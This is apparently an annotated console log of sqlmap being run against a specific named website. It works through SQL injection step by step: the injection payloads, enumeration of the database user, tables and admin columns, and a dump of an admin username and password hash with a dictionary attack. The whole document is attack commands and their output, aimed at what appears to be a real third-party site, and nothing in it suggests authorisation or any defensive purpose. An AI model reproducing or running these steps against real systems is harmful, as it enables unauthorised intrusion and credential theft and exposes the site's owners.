D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

shutting down at: 16:58:14

D:\Python27\sqlmap>